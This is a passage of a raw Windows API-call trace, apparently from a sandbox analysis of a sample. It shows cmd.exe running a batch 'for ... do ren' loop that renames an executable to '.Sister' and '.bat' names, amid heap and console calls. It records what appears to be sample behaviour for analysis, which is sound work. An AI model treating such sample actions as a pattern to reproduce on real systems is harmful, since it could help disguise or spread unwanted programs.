lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0142.632] ??_V@YAXPEAX@Z () returned 0x1 [0142.632] GetProcessHeap () returned 0x21ed8c70000 [0142.632] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d44540 [0142.632] GetProcessHeap () returned 0x21ed8c70000 [0142.632] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d44680 [0142.632] GetProcessHeap () returned 0x21ed8c70000 [0142.632] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d44680, Size=0x130) returned 0x21ed8d44680 [0142.632] GetProcessHeap () returned 0x21ed8c70000 [0142.632] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d44680) returned 0x130 [0142.632] malloc (_Size=0xffce) returned 0x21ed90fff80 [0142.632] ??_V@YAXPEAX@Z () returned 0x21ed90fff80 [0142.632] GetProcessHeap () returned 0x21ed8c70000 [0142.632] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d42e50 [0142.632] GetProcessHeap () returned 0x21ed8c70000 [0142.632] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5c630 [0142.632] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0142.632] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0142.632] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0142.633] GetLastError () returned 0x2 [0142.633] GetProcessHeap () returned 0x21ed8c70000 [0142.633] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed92f1210 [0142.633] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed92f1220 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0142.633] SetErrorMode (uMode=0x0) returned 0x0 [0142.633] SetErrorMode (uMode=0x1) returned 0x0 [0142.633] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed90fff80, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0142.633] SetErrorMode (uMode=0x0) returned 0x1 [0142.634] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0142.634] GetProcessHeap () returned 0x21ed8c70000 [0142.634] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5dc20 [0142.634] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0142.634] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0142.634] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0142.634] GetLastError () returned 0x2 [0142.634] ??_V@YAXPEAX@Z () returned 0x1 [0142.634] malloc (_Size=0xffce) returned 0x21ed90fff80 [0142.634] ??_V@YAXPEAX@Z () returned 0x21ed90fff80 [0142.634] malloc (_Size=0xffce) returned 0x21ed910ff60 [0142.634] ??_V@YAXPEAX@Z () returned 0x21ed910ff60 [0142.635] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0142.635] GetLastError () returned 0x2 [0142.635] _get_osfhandle (_FileHandle=2) returned 0x54 [0142.635] GetFileType (hFile=0x54) returned 0x2 [0142.635] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0142.635] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0142.638] _get_osfhandle (_FileHandle=2) returned 0x54 [0142.638] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0142.641] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0142.641] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0142.641] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0142.655] longjmp () [0142.655] ??_V@YAXPEAX@Z () returned 0x1 [0142.655] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29182c00, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0x29182c00, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x6a501200, ftLastWriteTime.dwHighDateTime=0x1d61406, nFileSizeHigh=0x0, nFileSizeLow=0x40800, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", cAlternateFileName="")) returned 1 [0142.655] GetProcessHeap () returned 0x21ed8c70000 [0142.655] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d440e0, Size=0x1c2) returned 0x21ed8d447c0 [0142.655] GetProcessHeap () returned 0x21ed8c70000 [0142.655] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d447c0) returned 0x1c2 [0142.655] GetProcessHeap () returned 0x21ed8c70000 [0142.655] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d5f310 [0142.655] GetProcessHeap () returned 0x21ed8c70000 [0142.655] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5f310, Size=0x30) returned 0x21ed8d5f310 [0142.655] GetProcessHeap () returned 0x21ed8c70000 [0142.655] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d5f310) returned 0x30 [0142.655] GetProcessHeap () returned 0x21ed8c70000 [0142.655] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d5f350 [0142.656] malloc (_Size=0x1ff9c) returned 0x21ed911ff40 [0142.658] GetProcessHeap () returned 0x21ed8c70000 [0142.658] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x7c) returned 0x21ed8d440e0 [0142.658] ??_V@YAXPEAX@Z () returned 0x1 [0142.660] GetProcessHeap () returned 0x21ed8c70000 [0142.660] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5f350, Size=0x3d0) returned 0x21ed8d5f350 [0142.660] GetProcessHeap () returned 0x21ed8c70000 [0142.660] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d5f350) returned 0x3d0 [0142.660] GetProcessHeap () returned 0x21ed8c70000 [0142.660] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d5f730 [0142.660] GetProcessHeap () returned 0x21ed8c70000 [0142.660] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5f730, Size=0x290) returned 0x21ed8d5f730 [0142.660] GetProcessHeap () returned 0x21ed8c70000 [0142.660] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d5f730) returned 0x290 [0142.660] GetProcessHeap () returned 0x21ed8c70000 [0142.660] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d5f9d0 [0142.660] GetProcessHeap () returned 0x21ed8c70000 [0142.660] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5f9d0, Size=0x30) returned 0x21ed8d5f9d0 [0142.661] GetProcessHeap () returned 0x21ed8c70000 [0142.661] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d5f9d0) returned 0x30 [0142.661] GetProcessHeap () returned 0x21ed8c70000 [0142.661] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d5fa10 [0142.661] malloc (_Size=0x1ff9c) returned 0x21ed911ff40 [0142.664] GetProcessHeap () returned 0x21ed8c70000 [0142.664] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x7c) returned 0x21ed8d44170 [0142.664] ??_V@YAXPEAX@Z () returned 0x1 [0142.665] malloc (_Size=0x1ff9c) returned 0x21ed911ff40 [0142.668] GetFullPathNameW (in: lpFileName="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed911ff40, lpFilePart=0xa6cf4fe1c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fe1c8*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0142.668] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d43330 [0142.669] FindClose (in: hFindFile=0x21ed8d43330 | out: hFindFile=0x21ed8d43330) returned 1 [0142.755] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d42c10 [0142.756] FindClose (in: hFindFile=0x21ed8d42c10 | out: hFindFile=0x21ed8d42c10) returned 1 [0142.756] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x7f7cd874, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x7f7cd874, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d43150 [0142.756] FindClose (in: hFindFile=0x21ed8d43150 | out: hFindFile=0x21ed8d43150) returned 1 [0142.756] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29182c00, ftCreationTime.dwHighDateTime=0x1d6141f, ftLastAccessTime.dwLowDateTime=0x29182c00, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x6a501200, ftLastWriteTime.dwHighDateTime=0x1d61406, nFileSizeHigh=0x0, nFileSizeLow=0x40800, dwReserved0=0x4, dwReserved1=0x80, cFileName="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", cAlternateFileName="CUSERS~1.EXE")) returned 0x21ed8d42f70 [0142.756] FindClose (in: hFindFile=0x21ed8d42f70 | out: hFindFile=0x21ed8d42f70) returned 1 [0142.757] _wcsnicmp (_String1="CUSERS~1.EXE", _String2="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", _MaxCount=0x35) returned 22 [0142.757] malloc (_Size=0x1ff9c) returned 0x21ed913fef0 [0142.758] ??_V@YAXPEAX@Z () returned 0x21ed913fef0 [0142.759] GetProcessHeap () returned 0x21ed8c70000 [0142.759] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d44990 [0142.759] ??_V@YAXPEAX@Z () returned 0x1 [0142.759] ??_V@YAXPEAX@Z () returned 0x1 [0142.760] GetProcessHeap () returned 0x21ed8c70000 [0142.760] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d5fa10, Size=0x3d0) returned 0x21ed8d5fa10 [0142.760] GetProcessHeap () returned 0x21ed8c70000 [0142.760] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d5fa10) returned 0x3d0 [0142.760] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0142.760] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.760] GetFileType (hFile=0x50) returned 0x2 [0142.761] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0142.761] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0142.783] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.783] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0142.809] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0142.809] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0142.810] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0142.810] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.810] GetFileType (hFile=0x50) returned 0x2 [0142.810] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0142.810] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0142.899] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.899] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0142.937] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.937] GetFileType (hFile=0x50) returned 0x2 [0142.937] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0142.937] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0142.951] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.951] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d5f320*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d5f320*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0142.970] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" ") returned 120 [0142.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.970] GetFileType (hFile=0x50) returned 0x2 [0142.970] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0142.970] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0142.996] _get_osfhandle (_FileHandle=1) returned 0x50 [0142.996] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x78, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x78) returned 1 [0143.067] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe558 | out: _Buffer=" & ") returned 3 [0143.067] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.067] GetFileType (hFile=0x50) returned 0x2 [0143.067] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0143.067] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0143.074] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.074] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0143.077] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0xa6cf4fe528 | out: _Buffer="for") returned 3 [0143.077] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.077] GetFileType (hFile=0x50) returned 0x2 [0143.078] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0143.078] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0143.083] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.083] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x3) returned 1 [0143.085] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" %a in ") returned 7 [0143.085] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.085] GetFileType (hFile=0x50) returned 0x2 [0143.085] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0143.085] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0143.086] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.086] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x7) returned 1 [0143.088] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0xa6cf4fe528 | out: _Buffer="(\"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe\") do ") returned 85 [0143.088] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.088] GetFileType (hFile=0x50) returned 0x2 [0143.088] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0143.088] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0143.089] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.089] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x55, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x55) returned 1 [0143.097] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.097] GetFileType (hFile=0x50) returned 0x2 [0143.098] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0143.098] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0143.099] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.099] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d5f9e0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed8d5f9e0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0143.102] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 120 [0143.102] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.102] GetFileType (hFile=0x50) returned 0x2 [0143.102] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0143.103] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0143.105] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.105] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x78, lpNumberOfCharsWritten=0xa6cf4fe4f8, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe4f8*=0x78) returned 1 [0143.123] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0143.123] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.123] GetFileType (hFile=0x50) returned 0x2 [0143.123] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0143.123] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0143.196] _get_osfhandle (_FileHandle=1) returned 0x50 [0143.196] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0143.206] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0143.218] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0143.219] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0143.219] malloc (_Size=0xffce) returned 0x21ed911ff40 [0143.220] ??_V@YAXPEAX@Z () returned 0x21ed911ff40 [0143.220] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0143.220] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0143.220] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0143.221] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0143.221] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0143.221] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0143.221] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0143.221] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0143.221] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0143.221] ??_V@YAXPEAX@Z () returned 0x1 [0143.221] GetProcessHeap () returned 0x21ed8c70000 [0143.221] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1f0) returned 0x21ed8d44a10 [0143.221] GetProcessHeap () returned 0x21ed8c70000 [0143.221] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d44a10, Size=0x100) returned 0x21ed8d44a10 [0143.221] GetProcessHeap () returned 0x21ed8c70000 [0143.221] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d44a10) returned 0x100 [0143.221] GetProcessHeap () returned 0x21ed8c70000 [0143.221] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x108) returned 0x21ed8d44b20 [0143.221] GetProcessHeap () returned 0x21ed8c70000 [0143.221] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1f0) returned 0x21ed8d44c30 [0143.221] GetProcessHeap () returned 0x21ed8c70000 [0143.221] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d44c30, Size=0x100) returned 0x21ed8d44c30 [0143.221] GetProcessHeap () returned 0x21ed8c70000 [0143.221] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d44c30) returned 0x100 [0143.221] malloc (_Size=0xffce) returned 0x21ed911ff40 [0143.222] ??_V@YAXPEAX@Z () returned 0x21ed911ff40 [0143.222] GetProcessHeap () returned 0x21ed8c70000 [0143.222] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d42c10 [0143.222] GetProcessHeap () returned 0x21ed8c70000 [0143.222] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed8d5cff0 [0143.222] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", _String2=".") returned 53 [0143.222] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", _String2="..") returned 53 [0143.222] GetFileAttributesW (lpFileName="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe")) returned 0x20 [0143.222] GetProcessHeap () returned 0x21ed8c70000 [0143.222] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9301200 [0143.223] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9301210 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0143.223] SetErrorMode (uMode=0x0) returned 0x0 [0143.224] SetErrorMode (uMode=0x1) returned 